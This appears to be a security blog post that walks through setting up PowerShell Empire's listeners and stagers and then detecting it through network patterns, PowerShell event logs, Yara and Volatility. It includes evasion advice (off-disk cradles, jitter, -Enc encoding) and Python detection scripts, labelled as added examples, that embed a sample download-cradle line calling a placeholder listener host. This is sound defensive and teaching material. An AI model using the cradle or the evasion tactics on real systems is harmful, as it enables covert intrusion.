In my last blog entry I explored some post-exploitation possibilities using PowerShell and Matt Graeber's repository of penetration testing tools, PowerSploit. PowerSploit, like PowerTools, is a set of fantastic scripts capable of accomplishing siloed tasks; however, they lack the modularity and plug-ability of a complete framework. Today I want to talk about a relatively new entrant to the field: PowerShell Empire.
Although Empire is only a couple of months old, the developers (who also worked on Veil) have built an impressive lightweight management architecture that borrows heavily from projects like PowerSploit and PowerTools to create a "pure PowerShell post-exploitation agent built on cryptographically-secure communications and a flexible architecture." While working with it the past couple of days I have found that it has a familiar workflow for those who are accustomed to Metasploit, making it easy to use for penetration testing Windows environments.
I have used Metasploit for many years, dabbled with Core Impact, and explored Armitage/Cobalt Strike at great length. These are all fantastic frameworks that are incredibly extensible and have strong community support and regular development release cycles. But the PowerSploit framework isn't exactly 'built-in' to those solutions (Cobalt Strike allows you to import modules, making it perhaps the easiest to extend in terms of PowerShell based attacks). I've had a few conversations lately with people who are unsure about what framework they should be using, and my answer is always the same: it depends. What you choose is largely dependent on financial limitations and objectives, but in the end it is probably best that you get familiar with all of these offerings.
There are a couple of key features in Empire:
- Invoke-Expression and WebClient download cradles allow you to stay off disk as much as possible. Evading on-access scanners is crucial, and leaving as few forensic artifacts as possible is just good trade-craft.
- The agent beacons in a cryptographically secure manner and in a way that effectively emulates command and control traffic.
As penetration testers our goal should be to effectively mimic real-world attack methodologies, network traffic and end-point activity to provide clients with a set of indicators of compromise that can be used to identify monitoring gaps. Tools like Empire help to push these ideas forward and reduce the latency between attacker innovation and defender evolution.
In this post I want to demonstrate how to use Empire, conduct basic IR memory analysis (in the same format as my previous article) and, more importantly, highlight some discussion around automated detection at the network and host level.
Red Team
I used Kali (2.0) for my server, but I'm sure this would work on most Debian based distributions.
git clone https://github.com/PowerShellEmpire/Empire.git
cd Empire/setup
./install.sh
Simple. To launch Empire, execute the following command from the Empire root directory with the -debug switch enabled to ensure logs are stored for troubleshooting and tracing your activity:
./empire -debug
Empire uses the concept of listeners, stagers and agents. A listener is a network socket instantiated on the server side that manages connections from infected agents. A stager is the payload you intend to deliver to the victim machine. To access your listeners simply type 'listeners' to enter the listeners context, followed by 'info'.
There are a few important values to note here. First, you can specify a KillDate and WorkingHours to limit agent and listener activity based on project limitations. I have certainly worked on a number of engagements in which a client had very specific restrictions about when we could work, for which this would have proved invaluable.
Second, the DefaultJitter value will help evade solutions that try to identify malicious beacon patterns that occur at a constant interval and imply scripted or machine-like activity that clearly stands out from natural human browsing patterns. There is also a DefaultProfile that defines the communication pattern the agent uses to beacon home, which we will talk more about later.
Third, define variables using 'set [variablename] [value]' syntax, and activate the listener with the 'execute' command. Type 'list' to verify that the listener is active and a network socket has been opened.
Logically the next step is to define a payload and choose a payload delivery mechanism. Type 'usestager' followed by TAB+TAB to see a list of options.
The two options that are best suited for payload execution are launcher and macro. Launcher will generate a PowerShell one-liner (Base64 encoded or clear text) that automatically sets the required staging key/listener values. Macro creates an Office macro with the appropriate callback values to establish a connection with the listener. This can be embedded in an Office document and used in social engineering attacks as a payload delivery mechanism.
To choose a stager type 'usestager [stagername] [listenername]' followed by 'execute'.
In the picture above you can see that the listener callback details are embedded in the script, and a (possibly) hard-coded value of /index.asp is used for the agent GET request. The session value for the agent is included. Base64 encoding the script will turn on the '-Enc' PowerShell flag, which decodes the payload at run-time, making investigation and traceability more difficult (again, simulating a real breach).
After executing this one-liner on our victim machine you will receive a callback notification that a new connection has been established. You can find active agents by typing 'agents' followed by 'list'.
Now that a connection is established you can type 'interact [agentname]' to hop into an agent session similar to meterpreter. Enter 'usemodule' followed by TAB+TAB to see all available options. You can identify privilege escalation opportunities, move laterally, establish persistence, steal tokens/credentials, install key-loggers and run all of the amazing post exploitation tasks available from the PowerSploit/PowerTools exploitation kits. I don't want to go into detail for each of these modules, as it is not the intent of this post. I simply wanted to demonstrate how to get up and running to encourage more offensive-security professionals to embrace this tool.
Blue Team
My objective for the defensive side of this post is to conduct some high level analysis of the tool itself and the general methods it employs. There are a lot of modules available and of course each of these may leave behind specific indicators of attack/compromise, but it's not my goal to go into each of them for this post.
Let's have a look at some of the network traffic first.
We see that after the initial stager is executed our first connection is established. On its own this is an extremely poor indicator. GET requests to /index.asp are going to be very common on any network. However, it does appear to be a hard-coded value, and it's important to gather as much information as possible.
After this initial connection a second stage payload is downloaded, key negotiation occurs, an encrypted session is established and the agent starts beaconing. This beacon is characterized by the DefaultProfile variable set for the listener running on the Empire server.
We can see the beacon issues 3 GET requests within a short period of time during a call home interval. The requests are sent to /news.asp, /admin/get.php and /login/process.jsp and have a generic Mozilla User-Agent.
Again, individually each of these actions appears benign, and alerting on it would generate a significant number of false positives (which is the intention of the framework). If we look at this traffic collectively we could design a network IDS rule that alerts when a connection is made to /index.asp and is followed by at least three GET requests to at least two of the URIs in the picture above.
Moreover, many organizations may issue tight controls around the type of browser application that can be installed, and it is unlikely to see a Windows server with Firefox running. If you are a system administrator that has implemented application white-listing and your users should only be using IE, the presence of a Mozilla/Chrome/Opera UA indicates a policy violation (best case scenario) or a manually crafted UA (worst case, perhaps indicating malware). In any event, it is possible to at least use this information to profile other infected hosts even if it doesn't serve as a point of initial detection. It's good to have options.
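The correlation described above, worked through as an added Python example (not code from the original post or from the Empire project): it parses constructed HTTP log lines, flags a host that requests /index.asp and then makes at least three GETs covering at least two of the profile URIs within an assumed 600-second window, and separately flags non-IE User-Agents on hosts that policy says should only run IE. The log line format, the window, the IE marker strings and the sample hosts are all constructed assumptions.

```python
"""Correlate HTTP request logs for the staging/beacon pattern described above (added example)."""
import re
from collections import defaultdict

STAGE_URI = "/index.asp"                                              # initial stager request seen in the post
PROFILE_URIS = {"/news.asp", "/admin/get.php", "/login/process.jsp"}  # DefaultProfile URIs seen in the post
WINDOW_SECONDS = 600               # assumed correlation window, not a value from the post
IE_MARKERS = ("MSIE", "Trident")   # substrings present in Internet Explorer User-Agents

# Constructed sample log (not captured traffic): <epoch> <src_host> <method> <uri> "<user-agent>"
SAMPLE_LOG = '''\
1441800000 10.0.0.5 GET /index.asp "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
1441800060 10.0.0.5 GET /news.asp "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
1441800061 10.0.0.5 GET /admin/get.php "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
1441800062 10.0.0.5 GET /login/process.jsp "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
1441800100 10.0.0.9 GET /index.asp "Mozilla/5.0 (Windows NT 6.1; rv:40.0) Gecko/20100101 Firefox/40.0"
1441800160 10.0.0.9 GET /news.asp "Mozilla/5.0 (Windows NT 6.1; rv:40.0) Gecko/20100101 Firefox/40.0"
1441800220 10.0.0.9 GET /news.asp "Mozilla/5.0 (Windows NT 6.1; rv:40.0) Gecko/20100101 Firefox/40.0"
1441800280 10.0.0.9 GET /news.asp "Mozilla/5.0 (Windows NT 6.1; rv:40.0) Gecko/20100101 Firefox/40.0"
1441800300 10.0.0.7 GET /admin/get.php "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
1441800301 10.0.0.7 GET /news.asp "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
1441800302 10.0.0.7 GET /login/process.jsp "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
'''

LINE_RE = re.compile(r'^(\d+) (\S+) (\S+) (\S+) "(.*)"$')

def parse_log(text):
    """Yield (epoch, host, method, uri, user_agent) tuples, skipping lines that do not parse."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield int(m.group(1)), m.group(2), m.group(3), m.group(4), m.group(5)

def detect_beacon_pattern(records):
    """Hosts that hit STAGE_URI and then, within WINDOW_SECONDS, make >= 3 GETs to
    profile URIs covering >= 2 distinct URIs (the rule sketched in the post)."""
    stage_time = {}
    hits = defaultdict(list)
    for ts, host, method, uri, _ua in sorted(records):
        if method != "GET":
            continue
        if uri == STAGE_URI:
            stage_time[host] = ts
        elif uri in PROFILE_URIS and host in stage_time and ts - stage_time[host] <= WINDOW_SECONDS:
            hits[host].append(uri)
    return sorted(h for h, uris in hits.items() if len(uris) >= 3 and len(set(uris)) >= 2)

def detect_ua_policy_violations(records, ie_only_hosts):
    """(host, user_agent) pairs where a host that should only run IE presents a non-IE UA."""
    flagged = set()
    for _ts, host, _method, _uri, ua in records:
        if host in ie_only_hosts and not any(marker in ua for marker in IE_MARKERS):
            flagged.add((host, ua))
    return sorted(flagged)

if __name__ == "__main__":
    recs = list(parse_log(SAMPLE_LOG))
    print("beacon pattern hosts:", detect_beacon_pattern(recs))
    print("UA policy violations:", detect_ua_policy_violations(recs, {"10.0.0.5", "10.0.0.7", "10.0.0.9"}))
```

Host 10.0.0.9 repeats a single profile URI and 10.0.0.7 never requests /index.asp, so neither meets the beacon rule; only the Firefox User-Agent on 10.0.0.9 trips the policy check.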
Of course all of this can be customized in Empire, so from a heuristic perspective I think the important take away really is recognizing the pattern itself and not necessarily the specific implementation of that pattern. That is a little bit esoteric, so let's try to gather more information from the host.
Dave recently published a two part series on Windows event monitoring. This is a fantastic starting point for most organizations, particularly those who are new to SIEM. I still come across a lot of environments that do not have any formal log management program, let alone a properly deployed SIEM with a good alerting framework that has been adequately tuned. For most companies, implementing monitoring for the event IDs Dave highlighted is a good objective. But for those with a more mature security program, I think it's important to start looking at PowerShell events.
PowerShell 2.0 is the default installed version for Windows 7 and Server 2008 R2 (prior versions do not have PowerShell installed) and unfortunately it does not provide much information from a logging perspective.
There are primarily two log files that are accessible:
- Microsoft Windows PowerShell
- Microsoft Windows PowerShell Operational
It is also possible to enable analytic and debug logging, however this is fairly noisy and resource intensive. Open Event Viewer and select View -> Show Analytic and Debug Logs. Then browse Application and Service Logs -> Microsoft -> Windows -> PowerShell and right click Analytic to enable it. I don't think there is a lot of value add here, but it can be useful when debugging a script or troubleshooting a problem.
In the 2.0 version of the Microsoft Windows PowerShell Operational log you will have the following events of interest:
- 40961 - Console is starting up
- 40962 - Console is ready for user input
These logs do contain meta information such as the user who performed the event and the computer it was executed on, but it is pretty limited. If you do not use PowerShell in your environment (even small organizations have use cases, so this is unlikely) then perhaps alerting on one of these events may be useful, but there is very little contextual information stored in the event log to indicate what was done while the console was accessed.
The Microsoft Windows PowerShell log in version 2.0 of PowerShell will often generate these event IDs:
- 600 - Provider Life-cycle
- 400 - Engine Life-cycle
- 403 - Engine Life-cycle
Again these events are fairly nondescript and provide little information.
Event ID 5156 from the Windows Security audit log can provide some additional information regarding network connections if we effectively filter to alert on outbound, external connections generated from applications like powershell.exe.
None of these indicators are of any substantial quality, but thankfully Microsoft introduced some improvements in version 3.0 of PowerShell (no additional changes to event logging functionality in version 4.0 or 5.0 unfortunately).
After upgrading to PowerShell version 3.0 you can specify a GPO setting to turn on module logging for Windows PowerShell modules in all sessions of all affected computers. Pipeline execution events for the selected modules will then be recorded in the PowerShell event logs I covered earlier. You can also interactively enable these values, as shown in the picture below:
If we now execute our PowerShell Empire one-line stager we will have more event log information to work with. Event IDs 4103 and 800 are recorded and contain a veritable wealth of information that can be used to detect suspicious activity.
At this point we can launch Rekall, list processes, identify suspect network connections, dump process memory and perform keyword string searches.
This is a similar workflow to my prior post. In large memory dumps it can be difficult (time consuming) to navigate or CTRL+F search through a document for specific keywords. Mark Russinovich's strings can greatly reduce this effort, but a better solution in my view is to write Yara rules and use them in conjunction with Volatility. If you aren't familiar, Yara is a tool designed to help execute binary or textual pattern matching searches. It is very easy to write rules, as the syntax is easy to pick up. Save the following to a text file with the .yara extension.
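An added Python example (not code from the post or from Empire) of the triage a SIEM or script could run over the command-line text carried in these 4103/800-style events: it decodes an -Enc/-EncodedCommand argument (base64 of UTF-16LE, the encoding PowerShell uses for that flag) and checks the result for the Invoke-Expression/WebClient download cradle indicators discussed earlier. The event text, the script contents and the LISTENER_PLACEHOLDER host are constructed, and the HostApplication= field name is an assumption about how the event is flattened to one line.

```python
"""Triage the command line recorded in PowerShell 4103/800-style events (added example)."""
import base64
import re

# Download cradle strings discussed in the post; matched case-insensitively in the decoded script
CRADLE_INDICATORS = ("Invoke-Expression", "IEX", "Net.WebClient", "DownloadString")
# -Enc or -EncodedCommand followed by whitespace and a base64 blob (-Encoding does not match)
ENC_RE = re.compile(r"-[Ee]nc(?:odedCommand)?\s+([A-Za-z0-9+/=]+)")

def make_encoded_command(script):
    """Encode a script the way PowerShell expects for -EncodedCommand: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample events (not real log data). LISTENER_PLACEHOLDER stands in for a listener
# host; the "HostApplication=" prefix is an assumed flattening of the event's field.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://LISTENER_PLACEHOLDER/index.asp')"
SAMPLE_EVENTS = [
    "HostApplication=powershell.exe -Enc " + make_encoded_command(SAMPLE_SCRIPT),
    "HostApplication=powershell.exe -File C:\\Scripts\\Get-Inventory.ps1",
    "HostApplication=powershell.exe -Enc " + make_encoded_command("Get-ChildItem C:\\Temp | Measure-Object"),
]

def decode_encoded_command(event_text):
    """Return the script hidden behind an -Enc/-EncodedCommand argument, or None if there is none."""
    m = ENC_RE.search(event_text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not valid base64/UTF-16LE; treat as not encoded

def triage_event(event_text):
    """Describe why an event is suspicious: {} means nothing found, 'encoded' marks use of -Enc,
    'cradle_indicators' lists the download-cradle strings found in the decoded script."""
    findings = {}
    decoded = decode_encoded_command(event_text)
    if decoded is not None:
        findings["encoded"] = True
        hits = [ind for ind in CRADLE_INDICATORS if ind.lower() in decoded.lower()]
        if hits:
            findings["cradle_indicators"] = hits
    return findings

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(triage_event(event) or "clean", "<-", event[:60])
```

The third sample shows why '-Enc' alone is a weak signal: an encoded but harmless pipeline is reported as encoded without any cradle indicators, so alerting should key on the decoded content rather than on the flag.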
rule example : powershell
{
    meta:
        Description = "Look for suspect PowerShell artifacts."
        filetype = "MemoryDump"
        Author = "Greg Carson"
        Date = "09-09-2015"
    strings:
        $s0 = "Invoke-" ascii
        $s1 = "-Enc" ascii
    condition:
        2 of them
}
This can then be imported to perform a search in Volatility:
vol.py -f image.raw --profile=Win7SP1x64 yarascan -y yarafilename.yara -p 7860
The workflow demonstrated on the Blue Team side of things isn't necessarily in any order. Ideally, you would have a SIEM rule trigger based on a suspicious pipeline execution PowerShell event (that has appropriate filters and suppression enabled), which results in an investigation of network traffic prior to and shortly after the event and is followed by a more thorough live memory forensic analysis of the system and others it may have had contact with. But this may not be possible depending on the environment you find yourself in. It's important not to rely on any one single security solution, as the indicators of attack will often exist in many different places and across disparate entities that solve different problems.
EDIT:
@tifkin_ contacted me to mention an additional tool from Mark Russinovich titled 'Sysmon'. It's a little bit outside the scope of this post, but the tool itself shows a lot of promise; I'd recommend defenders look into this.